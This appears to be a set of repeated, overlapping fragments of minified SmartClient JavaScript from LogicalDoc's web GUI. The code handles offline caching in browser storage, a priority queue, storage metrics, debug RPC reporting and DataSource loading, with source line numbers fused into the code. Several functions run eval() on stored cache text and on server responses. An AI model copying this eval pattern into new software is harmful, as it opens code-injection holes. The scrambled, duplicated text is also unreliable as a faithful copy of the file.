_3=isc.LogViewer.getGlobalLogCookieValue("isc_pageURL");if(!_2||_3!=location.href){var 
_4=this;this.Super("getGUID",[function(_2){_4.GUID=_2;isc.LogViewer.setGlobalLogCookieValue("isc_pageURL",location.href);isc.LogViewer.setGlobalLogCookieValue("isc_pageGUID",_4.GUID);_4.fireCallback(_1,"GUID",[_4.GUID])}],arguments);return}else{this.GUID=_2}}1928this.fireCallback(_1,"GUID",[this.GUID])},isc.A.sendTargetAvailableNotify=function isc_DebugTarget_sendTargetAvailableNotify(){this.socket.send("isc_DebugMaster",{methodName:"targetAvailable",args:[this.getServerProperties()]})},isc.A.getServerProperties=function isc_DebugTarget_getServerProperties(){var _1="Desktop";if(isc.Browser.isTablet)_1="Tablet";else if(isc.Browser.isHandset)_1="Handset";return isc.addProperties(this.Super("getServerProperties",arguments),{userAgent:navigator.userAgent,documentTitle:document.title,URL:location.href,formFactor:_1,browserVersion:isc.Browser.version,browserMinorVersion:isc.Browser.minorVersion})},isc.A.pushRPCUpdate=function isc_DebugTarget_pushRPCUpdate(_1){if(!isc.debugMaster)return;var _2={cancelled:_1.cancelled,receiveTime:_1.receiveTime,URL:_1.URL,transactionNum:_1.transactionNum,serializedCommResults:_1.serializedCommResults,serializedCommResultsAreFormatted:_1.serializedCommResultsAreFormatted,transport:_1.transport};var _3=[];for(var i=0;i<_1.operations.length;i++){var _5=_1.operations[i];var _6=_1.responses[i];_3[i]=this.rpcToRecord(_1,_5,_6);if(_1.operations.length>1)_3[i]._queueIndex=i}1929_2.rpcs=_3;isc.debugMaster.call("isc.RPCTracker.updateTransactionRecord",[_2]);_1.pushedToDebugMaster=true},isc.A.rpcToRecord=function isc_DebugTarget_rpcToRecord(_1,_2,_3){var _4=_2._dsRequest||_2.$374;var _5="RPCRequest";if(_4!=null)_5="DSRequest";else if(_2.data&&_2.data.is_ISC_RPC_DMI)_5="RPC DMI";else if(_2.wsOperation)_5="WSRequest";var _6;if(_2.operationType){_6=_2.operationType;if(_2.operationId){_6+="&lt;"+_2.operationId+"&gt;"}

File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_DataBinding.js
Code:

2424this.nextAttributeNumber[i]=counter}},sort:function(array){for(var i=0;i<array.length;i++){var swapped=false;for(var j=1;j<array.length-i;j++){if(array[j]<array[j-1]){var temp=array[j];array[j]=array[j-1];array[j-1]=temp;swapped=true}}2425if(!swapped)break}},getNextAttributeName:function(dataStore){if(this.unusedAttributeNumbers[dataStore]&&this.unusedAttributeNumbers[dataStore].length>0)2426{return"v"+this.unusedAttributeNumbers[dataStore].shift()}2427if(this.nextAttributeNumber[dataStore]==null){this.nextAttributeNumber[dataStore]=1}2428return"v"+this.nextAttributeNumber[dataStore]++},addToKeyIndex:function(userKey,dataStore,attr){var keyIndexValue=this.getKeyIndexValue(dataStore,attr);this.keyIndex[userKey]=keyIndexValue;this.reverseKeyIndex[keyIndexValue]=userKey;this.saveKeyIndex()},removeFromKeyIndex:function(userKey){var keyIndexValue=this.keyIndex[userKey];delete this.keyIndex[userKey];delete this.reverseKeyIndex[keyIndexValue];this.saveKeyIndex()},saveKeyIndex:function(){this.keyIndexStore.setAttribute(this.keyIndexKey,Offline.serialize(this.keyIndex));this.keyIndexStore.setAttribute(this.reverseKeyIndexKey,Offline.serialize(this.reverseKeyIndex));this.keyIndexStore.save("isc_userData_keyIndex")},buildReverseKeyIndex:function(){this.reverseKeyIndex={};for(var key in this.keyIndex){this.reverseKeyIndex[keyIndex[key]]=key}},getKeyIndexFromStore:function(){var kiText=this.keyIndexStore.getAttribute(this.keyIndexKey);if(kiText){eval("var ki = "+kiText)}else{var ki=null}2429return ki},getReverseKeyIndexFromStore:function(){var kiText=this.keyIndexStore.getAttribute(this.reverseKeyIndexKey);if(kiText){eval("var ki = "+kiText)}else{var ki=null}2430return ki}};if(window.isc){isc.defineClass("Offline").addClassProperties(Offline);isc.defineClass("UserDataPersistence").addClassProperties(UserDataPersistence)}

else{isc.addProperties=function(objOne,objTwo){for(var propName in objTwo)objOne[propName]=objTwo[propName]}2431isc.addProperties(isc.Offline,{serialize:function(object){return isc.OfflineJSONEncoder.encode(object)},logDebug:function(message){if(console)console.log(message)},logError:function(message){if(console){console.log(message)}else{alert(message)}},echoLeaf:function(obj){var output="",undef;if(obj===undef)return"undef";try{if(typeof obj=="Array"){output+="Array["+obj.length+"]"}else if(typeof obj=="Date"){output+="Date("+obj.toShortDate()+")"}else if(typeof obj=="Function"){output+=isc.Func.getName(obj,true)+"()"}else{switch(typeof obj){case"string":if(obj.length<=40){output+='"'+obj+'"';break}2432output+='"'+obj.substring(0,40)+'..."['+obj.length+']';output=output.replaceAll("\n","\\n").replaceAll("\r","\\r");break;case"object":if(obj==null){output+="null";break}2433if(obj.tagName!=null){output+="["+obj.tagName+"Element]";break}2434var toString=""+obj;if(toString!=""&&toString!="[object Object]"&&toString!="[object]")

File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_DataBinding.js
Code:

2390this.logDebug("Cache full when updating priority queue or metrics; rolling back the entire update");this.$786(key);if(pqOK)this.removeFromPriorityQueue(key);this.rebuildMetrics();throw e}else{throw e}}}2391this.logDebug("put() with key: "+key+"\nitem: "+this.echoLeaf(value)+": "+(end-ts)+"ms. Maintaining the priority queue and metrics took a further "+new Date().getTime()-end+"ms")},$788:function(key,value,applyPrefix){key=(applyPrefix===false?"":this.KEY_PREFIX)+key;switch(this.localStorageType()){case this.LOCAL_STORAGE:localStorage.setItem(key,value);break;case this.USERDATA_PERSISTENCE:UserDataPersistence.putValue(key,value);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:this.logError("Persistence method '"+this.localStorageType()+"' not yet supported");break}},isStorageException:function(e){switch(this.localStorageType()){case this.LOCAL_STORAGE:if(isc.Browser.isIE){return(e.number==-2147024882)}else if(isc.Browser.isMoz){return(e.name=="NS_ERROR_DOM_QUOTA_REACHED")}else{return(e.name=="QUOTA_EXCEEDED_ERR")}2392break;case this.USERDATA_PERSISTENCE:return(e.number==-2147024857)}},get:function(key){var ts=new Date().getTime(),item;switch(this.localStorageType()){case this.LOCAL_STORAGE:item=localStorage.getItem(this.KEY_PREFIX+key);break;case this.USERDATA_PERSISTENCE:item=UserDataPersistence.getValue(this.KEY_PREFIX+key);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:break}2393if(item)item=isc.clone(item);var end=new Date().getTime();this.logDebug("get() with key: "+key+"\nitem is: "+this.echoLeaf(item)+": "+(end-ts)+"ms");return item},remove:function(key,skipPriorityQueueUpdate){this.logDebug("Removing item for key: 
"+key);this.updateMetrics("remove",key);if(!skipPriorityQueueUpdate)this.removeFromPriorityQueue(key);this.$786(key)},$786:function(key,applyPrefix){key=(applyPrefix===false?"":this.KEY_PREFIX)+key;switch(this.localStorageType()){case this.LOCAL_STORAGE:localStorage.removeItem(key);break;case this.USERDATA_PERSISTENCE:UserDataPersistence.removeValue(key);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:break}},getUndecoratedKey:function(key){if(key&&key.startsWith(this.KEY_PREFIX)){key=key.substring(this.KEY_PREFIX.length)}2394return key},priorityQueueKey:"pq",addToPriorityQueue:function(userKey){this.removeFromPriorityQueue(userKey);var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2395pq.push(key);this.$788(this.priorityQueueKey,this.serialize(pq))},removeFromPriorityQueue:function(userKey){var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2396for(var i=0;i<pq.length;i++){if(pq[i]==key){var leading=pq.slice(0,i);var trailing=pq.slice(i+1);pq=leading.concat(trailing);break}}2397this.$788(this.priorityQueueKey,this.serialize(pq))},getAndRemoveOldestFromPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2398var oldest=pq.shift();this.$788(this.priorityQueueKey,this.serialize(pq));return this.toUserKey(oldest)},getPriorityQueueEntry:function(index){var key=this.getPriorityQueueKey(index);var value=this.get(key);var entry={};entry[key]=value;return entry},getPriorityQueueValue:function(index){var key=this.getPriorityQueueKey(index);return this.get(key)},getPriorityQueueKey:function(index){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2399return this.toUserKey(pq[index])},getPriorityQueue:function(){var 
pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}

2400return pq},toInternalKey:function(userKey){if(this.localStorageType()==this.USERDATA_PERSISTENCE){return UserDataPersistence.getDataStoreKey(this.KEY_PREFIX+userKey)}

File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_DataBinding.js
Code:

2394return key},priorityQueueKey:"pq",addToPriorityQueue:function(userKey){this.removeFromPriorityQueue(userKey);var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2395pq.push(key);this.$788(this.priorityQueueKey,this.serialize(pq))},removeFromPriorityQueue:function(userKey){var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2396for(var i=0;i<pq.length;i++){if(pq[i]==key){var leading=pq.slice(0,i);var trailing=pq.slice(i+1);pq=leading.concat(trailing);break}}2397this.$788(this.priorityQueueKey,this.serialize(pq))},getAndRemoveOldestFromPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2398var oldest=pq.shift();this.$788(this.priorityQueueKey,this.serialize(pq));return this.toUserKey(oldest)},getPriorityQueueEntry:function(index){var key=this.getPriorityQueueKey(index);var value=this.get(key);var entry={};entry[key]=value;return entry},getPriorityQueueValue:function(index){var key=this.getPriorityQueueKey(index);return this.get(key)},getPriorityQueueKey:function(index){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2399return this.toUserKey(pq[index])},getPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2400return pq},toInternalKey:function(userKey){if(this.localStorageType()==this.USERDATA_PERSISTENCE){return UserDataPersistence.getDataStoreKey(this.KEY_PREFIX+userKey)}2401return userKey},toUserKey:function(internalKey){if(this.localStorageType()==this.USERDATA_PERSISTENCE){return this.getUndecoratedKey(UserDataPersistence.getUserKey(internalKey))}2402return internalKey},countKey:"storedEntryCount__",keyKey:"storedKeyBytes__",valueKey:"storedValueBytes__",updateMetrics:function(mode,key,value,oldValue){var 
realKey=this.KEY_PREFIX+key,storedEntries=this.get(this.countKey)||0,storedKeyBytes=this.get(this.keyKey)||0,storedValueBytes=this.get(this.valueKey)||0;storedKeyBytes=1*storedKeyBytes;storedValueBytes=1*storedValueBytes;if(mode=="remove"){var item=this.get(key);if(item!=null){storedEntries--;storedKeyBytes-=realKey.length;storedValueBytes-=item.length}}else{if(oldValue==null){storedEntries++;storedKeyBytes+=realKey.length;storedValueBytes+=value.length}else{storedValueBytes+=value.length-oldValue.length}}2403this.$788(this.countKey,storedEntries);this.$788(this.keyKey,storedKeyBytes);this.$788(this.valueKey,storedValueBytes)},rebuildMetrics:function(){var pq=this.getPriorityQueue(),entries=0,keyBytes=0,valueBytes=0;for(var i=0;i<pq.length;i++){var value=this.get(pq[i]);entries++;keyBytes+=pq[i].length;valueBytes+=value.length}2404this.$788(this.countKey,entries);this.$788(this.keyKey,keyBytes);this.$788(this.valueKey,valueBytes)},getStorageMetrics:function(){var storedEntries=this.get(this.countKey)||0,storedKeyBytes=this.get(this.keyKey)||0,storedValueBytes=this.get(this.valueKey)||0,countLen=0,keyLen=0,valueLen=0;if(storedEntries)countLen=storedEntries.length;if(storedKeyBytes)keyLen=storedKeyBytes.length;if(storedValueBytes)valueLen=storedValueBytes.length;storedEntries=1*storedEntries;storedKeyBytes=1*storedKeyBytes;storedValueBytes=1*storedValueBytes;var pqText=this.get(this.priorityQueueKey);var overhead=this.countKey.length+this.keyKey.length+this.valueKey.length+countLen+keyLen+valueLen;var pqLength=pqText==null?0:pqText.length+(this.KEY_PREFIX+this.priorityQueueKey).length;return{storedEntries:storedEntries,storedKeyBytes:storedKeyBytes,storedValueBytes:storedValueBytes,metricsOverhead:overhead,priorityQueue:pqLength,total:storedKeyBytes+storedValueBytes+overhead+pqLength}},getTotalStorageUsed:function(){var metrics=this.getStorageMetrics();return 
metrics.storedKeyBytes+metrics.storedValueBytes+metrics.metricsOverhead+metrics.priorityQueue},storeResponse:function(dsRequest,dsResponse){var ts=new Date().getTime();dsResponse.offlineTimestamp=ts;var trimmedRequest=this.trimRequest(dsRequest),key=this.serialize(trimmedRequest),value=this.serialize(this.trimResponse(dsResponse));this.logDebug("storeResponse serializing: "+(new Date().getTime()-ts)+"ms");if(this.get(key)==null){if(this.getSCStoredValuesCount()>=this.maxResponsesToPersist){this.removeOldestEntry()}}

File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_DataBinding.js
Code:

2393if(item)item=isc.clone(item);var end=new Date().getTime();this.logDebug("get() with key: "+key+"\nitem is: "+this.echoLeaf(item)+": "+(end-ts)+"ms");return item},remove:function(key,skipPriorityQueueUpdate){this.logDebug("Removing item for key: "+key);this.updateMetrics("remove",key);if(!skipPriorityQueueUpdate)this.removeFromPriorityQueue(key);this.$786(key)},$786:function(key,applyPrefix){key=(applyPrefix===false?"":this.KEY_PREFIX)+key;switch(this.localStorageType()){case this.LOCAL_STORAGE:localStorage.removeItem(key);break;case this.USERDATA_PERSISTENCE:UserDataPersistence.removeValue(key);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:break}},getUndecoratedKey:function(key){if(key&&key.startsWith(this.KEY_PREFIX)){key=key.substring(this.KEY_PREFIX.length)}2394return key},priorityQueueKey:"pq",addToPriorityQueue:function(userKey){this.removeFromPriorityQueue(userKey);var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2395pq.push(key);this.$788(this.priorityQueueKey,this.serialize(pq))},removeFromPriorityQueue:function(userKey){var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2396for(var i=0;i<pq.length;i++){if(pq[i]==key){var leading=pq.slice(0,i);var trailing=pq.slice(i+1);pq=leading.concat(trailing);break}}2397this.$788(this.priorityQueueKey,this.serialize(pq))},getAndRemoveOldestFromPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2398var oldest=pq.shift();this.$788(this.priorityQueueKey,this.serialize(pq));return this.toUserKey(oldest)},getPriorityQueueEntry:function(index){var key=this.getPriorityQueueKey(index);var value=this.get(key);var entry={};entry[key]=value;return entry},getPriorityQueueValue:function(index){var key=this.getPriorityQueueKey(index);return 
this.get(key)},getPriorityQueueKey:function(index){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2399return this.toUserKey(pq[index])},getPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2400return pq},toInternalKey:function(userKey){if(this.localStorageType()==this.USERDATA_PERSISTENCE){return UserDataPersistence.getDataStoreKey(this.KEY_PREFIX+userKey)}2401return userKey},toUserKey:function(internalKey){if(this.localStorageType()==this.USERDATA_PERSISTENCE){return this.getUndecoratedKey(UserDataPersistence.getUserKey(internalKey))}2402return internalKey},countKey:"storedEntryCount__",keyKey:"storedKeyBytes__",valueKey:"storedValueBytes__",updateMetrics:function(mode,key,value,oldValue){var realKey=this.KEY_PREFIX+key,storedEntries=this.get(this.countKey)||0,storedKeyBytes=this.get(this.keyKey)||0,storedValueBytes=this.get(this.valueKey)||0;storedKeyBytes=1*storedKeyBytes;storedValueBytes=1*storedValueBytes;if(mode=="remove"){var item=this.get(key);if(item!=null){storedEntries--;storedKeyBytes-=realKey.length;storedValueBytes-=item.length}}else{if(oldValue==null){storedEntries++;storedKeyBytes+=realKey.length;storedValueBytes+=value.length}else{storedValueBytes+=value.length-oldValue.length}}2403this.$788(this.countKey,storedEntries);this.$788(this.keyKey,storedKeyBytes);this.$788(this.valueKey,storedValueBytes)},rebuildMetrics:function(){var pq=this.getPriorityQueue(),entries=0,keyBytes=0,valueBytes=0;for(var i=0;i<pq.length;i++){var value=this.get(pq[i]);entries++;keyBytes+=pq[i].length;valueBytes+=value.length}

File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_DataBinding.js
Code:

292}293return _1}294,isc.A.load=function isc_c_DataSource_load(_1,_2,_3,_4){if(!isc.isAn.Array(_1))_1=[_1];if(_1.length<=0){this.logWarn("No DataSource IDs passed in.");return}295var _5=[];for(var i=0;i<_1.length;i++){if(!this.isLoaded(_1[i])||_3)_5.add(_1[i])}296var _7=_5.join(","),_8=isc.DataSource.loaderURL+(isc.DataSource.loaderURL.contains("?")?"&":"?")+(_4?"loadParents=true&":"")+"dataSource="+_7,_9=_1;;if(_5.length>0){isc.RPCManager.send(null,function(_10,_11,_12){if(_10.httpResponseCode==404){isc.warn("The DataSourceLoader servlet is not installed.");return null}

297if(_4&&!_3)isc.DataSource.$92w=true;try{eval(_11)}catch(e){isc.logWarn("Encountered problems trying to load DataSources: "+isc.echoAll(e))}298delete isc.DataSource.$92w;if(_2)this.fireCallback(_2,["dsID"],[_9])},{actionURL:_8,httpMethod:"GET",willHandleError:true299}300)}else{this.logWarn("DataSource(s) already loaded: "+_1.join(",")+"\nUse forceReload to reload such DataSources");if(_2)this.fireCallback(_2,["dsID"],[_9])}301}302,isc.A.loadWithParents=function isc_c_DataSource_loadWithParents(_1,_2,_3){this.load(_1,_2,_3,true)}

File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_DataBinding.js
Code:

2392break;case this.USERDATA_PERSISTENCE:return(e.number==-2147024857)}},get:function(key){var ts=new Date().getTime(),item;switch(this.localStorageType()){case this.LOCAL_STORAGE:item=localStorage.getItem(this.KEY_PREFIX+key);break;case this.USERDATA_PERSISTENCE:item=UserDataPersistence.getValue(this.KEY_PREFIX+key);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:break}2393if(item)item=isc.clone(item);var end=new Date().getTime();this.logDebug("get() with key: "+key+"\nitem is: "+this.echoLeaf(item)+": "+(end-ts)+"ms");return item},remove:function(key,skipPriorityQueueUpdate){this.logDebug("Removing item for key: "+key);this.updateMetrics("remove",key);if(!skipPriorityQueueUpdate)this.removeFromPriorityQueue(key);this.$786(key)},$786:function(key,applyPrefix){key=(applyPrefix===false?"":this.KEY_PREFIX)+key;switch(this.localStorageType()){case this.LOCAL_STORAGE:localStorage.removeItem(key);break;case this.USERDATA_PERSISTENCE:UserDataPersistence.removeValue(key);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:break}},getUndecoratedKey:function(key){if(key&&key.startsWith(this.KEY_PREFIX)){key=key.substring(this.KEY_PREFIX.length)}2394return key},priorityQueueKey:"pq",addToPriorityQueue:function(userKey){this.removeFromPriorityQueue(userKey);var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2395pq.push(key);this.$788(this.priorityQueueKey,this.serialize(pq))},removeFromPriorityQueue:function(userKey){var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2396for(var i=0;i<pq.length;i++){if(pq[i]==key){var leading=pq.slice(0,i);var 
trailing=pq.slice(i+1);pq=leading.concat(trailing);break}}2397this.$788(this.priorityQueueKey,this.serialize(pq))},getAndRemoveOldestFromPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2398var oldest=pq.shift();this.$788(this.priorityQueueKey,this.serialize(pq));return this.toUserKey(oldest)},getPriorityQueueEntry:function(index){var key=this.getPriorityQueueKey(index);var value=this.get(key);var entry={};entry[key]=value;return entry},getPriorityQueueValue:function(index){var key=this.getPriorityQueueKey(index);return this.get(key)},getPriorityQueueKey:function(index){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2399return this.toUserKey(pq[index])},getPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2400return pq},toInternalKey:function(userKey){if(this.localStorageType()==this.USERDATA_PERSISTENCE){return UserDataPersistence.getDataStoreKey(this.KEY_PREFIX+userKey)}2401return userKey},toUserKey:function(internalKey){if(this.localStorageType()==this.USERDATA_PERSISTENCE){return this.getUndecoratedKey(UserDataPersistence.getUserKey(internalKey))}2402return internalKey},countKey:"storedEntryCount__",keyKey:"storedKeyBytes__",valueKey:"storedValueBytes__",updateMetrics:function(mode,key,value,oldValue){var realKey=this.KEY_PREFIX+key,storedEntries=this.get(this.countKey)||0,storedKeyBytes=this.get(this.keyKey)||0,storedValueBytes=this.get(this.valueKey)||0;storedKeyBytes=1*storedKeyBytes;storedValueBytes=1*storedValueBytes;if(mode=="remove"){var item=this.get(key);if(item!=null){storedEntries--;storedKeyBytes-=realKey.length;storedValueBytes-=item.length}}else{if(oldValue==null){storedEntries++;storedKeyBytes+=realKey.length;storedValueBytes+=value.length}else{storedValueBytes+=value.length-oldValue.length}}

File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_DataBinding.js
Code:

2423counter++}2424this.nextAttributeNumber[i]=counter}},sort:function(array){for(var i=0;i<array.length;i++){var swapped=false;for(var j=1;j<array.length-i;j++){if(array[j]<array[j-1]){var temp=array[j];array[j]=array[j-1];array[j-1]=temp;swapped=true}}2425if(!swapped)break}},getNextAttributeName:function(dataStore){if(this.unusedAttributeNumbers[dataStore]&&this.unusedAttributeNumbers[dataStore].length>0)2426{return"v"+this.unusedAttributeNumbers[dataStore].shift()}2427if(this.nextAttributeNumber[dataStore]==null){this.nextAttributeNumber[dataStore]=1}2428return"v"+this.nextAttributeNumber[dataStore]++},addToKeyIndex:function(userKey,dataStore,attr){var keyIndexValue=this.getKeyIndexValue(dataStore,attr);this.keyIndex[userKey]=keyIndexValue;this.reverseKeyIndex[keyIndexValue]=userKey;this.saveKeyIndex()},removeFromKeyIndex:function(userKey){var keyIndexValue=this.keyIndex[userKey];delete this.keyIndex[userKey];delete this.reverseKeyIndex[keyIndexValue];this.saveKeyIndex()},saveKeyIndex:function(){this.keyIndexStore.setAttribute(this.keyIndexKey,Offline.serialize(this.keyIndex));this.keyIndexStore.setAttribute(this.reverseKeyIndexKey,Offline.serialize(this.reverseKeyIndex));this.keyIndexStore.save("isc_userData_keyIndex")},buildReverseKeyIndex:function(){this.reverseKeyIndex={};for(var key in this.keyIndex){this.reverseKeyIndex[keyIndex[key]]=key}},getKeyIndexFromStore:function(){var kiText=this.keyIndexStore.getAttribute(this.keyIndexKey);if(kiText){eval("var ki = "+kiText)}else{var ki=null}2429return ki},getReverseKeyIndexFromStore:function(){var kiText=this.keyIndexStore.getAttribute(this.reverseKeyIndexKey);if(kiText){eval("var ki = "+kiText)}else{var ki=null}2430return ki}};if(window.isc){isc.defineClass("Offline").addClassProperties(Offline);isc.defineClass("UserDataPersistence").addClassProperties(UserDataPersistence)}else{isc.addProperties=function(objOne,objTwo){for(var propName in 
objTwo)objOne[propName]=objTwo[propName]}2431isc.addProperties(isc.Offline,{serialize:function(object){return isc.OfflineJSONEncoder.encode(object)},logDebug:function(message){if(console)console.log(message)},logError:function(message){if(console){console.log(message)}else{alert(message)}},echoLeaf:function(obj){var output="",undef;if(obj===undef)return"undef";try{if(typeof obj=="Array"){output+="Array["+obj.length+"]"}else if(typeof obj=="Date"){output+="Date("+obj.toShortDate()+")"}else if(typeof obj=="Function"){output+=isc.Func.getName(obj,true)+"()"}else{switch(typeof obj){case"string":if(obj.length<=40){output+='"'+obj+'"';break}2432output+='"'+obj.substring(0,40)+'..."['+obj.length+']';output=output.replaceAll("\n","\\n").replaceAll("\r","\\r");break;case"object":if(obj==null){output+="null";break}2433if(obj.tagName!=null){output+="["+obj.tagName+"Element]";break}

File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_DataBinding.js
Code:

2389var end=new Date().getTime();var pqOK=false,metricsOK=false;while(!pqOK||!metricsOK){try{if(!pqOK)this.addToPriorityQueue(key);pqOK=true;if(!metricsOK)this.updateMetrics("put",key,value,oldValue);metricsOK=true}catch(e){if(this.isStorageException(e)){if(recycleEntries!==false){var entries=this.getStorageMetrics().storedEntries;if(entries>0){this.logDebug("Cache full when updating priority queue or metrics; removing oldest entry and trying again");this.removeOldestEntry();continue}}2390this.logDebug("Cache full when updating priority queue or metrics; rolling back the entire update");this.$786(key);if(pqOK)this.removeFromPriorityQueue(key);this.rebuildMetrics();throw e}else{throw e}}}2391this.logDebug("put() with key: "+key+"\nitem: "+this.echoLeaf(value)+": "+(end-ts)+"ms. Maintaining the priority queue and metrics took a further "+new Date().getTime()-end+"ms")},$788:function(key,value,applyPrefix){key=(applyPrefix===false?"":this.KEY_PREFIX)+key;switch(this.localStorageType()){case this.LOCAL_STORAGE:localStorage.setItem(key,value);break;case this.USERDATA_PERSISTENCE:UserDataPersistence.putValue(key,value);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:this.logError("Persistence method '"+this.localStorageType()+"' not yet supported");break}},isStorageException:function(e){switch(this.localStorageType()){case this.LOCAL_STORAGE:if(isc.Browser.isIE){return(e.number==-2147024882)}else if(isc.Browser.isMoz){return(e.name=="NS_ERROR_DOM_QUOTA_REACHED")}else{return(e.name=="QUOTA_EXCEEDED_ERR")}2392break;case this.USERDATA_PERSISTENCE:return(e.number==-2147024857)}},get:function(key){var ts=new Date().getTime(),item;switch(this.localStorageType()){case this.LOCAL_STORAGE:item=localStorage.getItem(this.KEY_PREFIX+key);break;case this.USERDATA_PERSISTENCE:item=UserDataPersistence.getValue(this.KEY_PREFIX+key);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case 
this.GOOGLE_GEARS:break}2393

if(item)item=isc.clone(item);var end=new Date().getTime();this.logDebug("get() with key: "+key+"\nitem is: "+this.echoLeaf(item)+": "+(end-ts)+"ms");return item},remove:function(key,skipPriorityQueueUpdate){this.logDebug("Removing item for key: "+key);this.updateMetrics("remove",key);if(!skipPriorityQueueUpdate)this.removeFromPriorityQueue(key);this.$786(key)},$786:function(key,applyPrefix){key=(applyPrefix===false?"":this.KEY_PREFIX)+key;switch(this.localStorageType()){case this.LOCAL_STORAGE:localStorage.removeItem(key);break;case this.USERDATA_PERSISTENCE:UserDataPersistence.removeValue(key);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:break}},getUndecoratedKey:function(key){if(key&&key.startsWith(this.KEY_PREFIX)){key=key.substring(this.KEY_PREFIX.length)}2394return key},priorityQueueKey:"pq",addToPriorityQueue:function(userKey){this.removeFromPriorityQueue(userKey);var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2395pq.push(key);this.$788(this.priorityQueueKey,this.serialize(pq))},removeFromPriorityQueue:function(userKey){var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2396for(var i=0;i<pq.length;i++){if(pq[i]==key){var leading=pq.slice(0,i);var trailing=pq.slice(i+1);pq=leading.concat(trailing);break}}2397this.$788(this.priorityQueueKey,this.serialize(pq))},getAndRemoveOldestFromPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2398var oldest=pq.shift();this.$788(this.priorityQueueKey,this.serialize(pq));return this.toUserKey(oldest)},getPriorityQueueEntry:function(index){var key=this.getPriorityQueueKey(index);var value=this.get(key);var entry={};entry[key]=value;return entry},getPriorityQueueValue:function(index){var key=this.getPriorityQueueKey(index);return 
this.get(key)},getPriorityQueueKey:function(index){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2399return this.toUserKey(pq[index])},getPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}

File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_DataBinding.js
Code:

